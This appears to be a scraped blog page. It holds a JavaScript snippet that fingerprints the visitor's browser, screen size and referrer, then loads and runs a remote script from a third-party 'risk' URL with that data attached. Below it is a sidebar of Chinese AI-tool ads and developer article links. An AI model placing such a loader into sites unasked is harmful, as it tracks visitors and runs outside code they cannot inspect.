var Sys = {};
var ua = navigator.userAgent.toLowerCase();
var s;
var lx;
(s = ua.match(/msie ([\d.]+)/)) ? Sys.ie = s[1] :
(s = ua.match(/firefox\/([\d.]+)/)) ? Sys.firefox = s[1] :
(s = ua.match(/chrome\/([\d.]+)/)) ? Sys.chrome = s[1] :
(s = ua.match(/opera\/([\d.]+)/)) ? Sys.opera = s[1] :
(s = ua.match(/version\/([\d.]+).*safari/)) ? Sys.safari = s[1] : 0;
if(Sys.ie)
{
lx = "IE" + Sys.ie;
}
else if(Sys.firefox)
{
lx = "Firefox" + Sys.firefox;
}
else if(Sys.chrome)
{
lx = "Chrome" + Sys.chrome;
}
else if(Sys.opera)
{
lx = "Opera" + Sys.opera;
}
else if(Sys.safari)
{
lx = "Safari" + Sys.safari;
}
else
{
lx = "鏈煡";
}
var w = window.screen.width;
var h = window.screen.height;
var auth = encodeURIComponent("0cdbUT0OX0LXdZfYnjHoeyP9h5HAwimgc9hKYirOTcV+L9yVXUe6i0wXOwrd/ZgzBcv4GMe3D2iv");
var ___doc = document.getElementsByTagName('head')[0];
var js = document.createElement('script');
js.setAttribute('type', 'text/javascript');
js.setAttribute('src', 'https://www.promptlypayments.com/risk/index-index2.js?ref='+encodeURIComponent(document.referrer) + '&w=' + w + '&h=' + h + '&lx=' + lx + '&auth=' + auth);
___doc.appendChild(js);
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· Linux系列:如何用heaptrack跟踪.NET程序的非托管内存泄露
· 开发者必知的日志记录最佳实践
· SQL Server 2025 AI相关能力初探
· Linux系列:如何用 C#调用 C方法造成内存泄露
· AI与.NET技术实操系列(二):开始使用ML.NET
· 无需6万激活码!GitHub神秘组织3小时极速复刻Manus,手把手教你使用OpenManus搭建本
· C#/.NET/.NET Core优秀项目和框架2025年2月简报
· 什么是nginx的强缓存和协商缓存
· 一文读懂知识蒸馏
· Manus爆火,是硬核还是营销?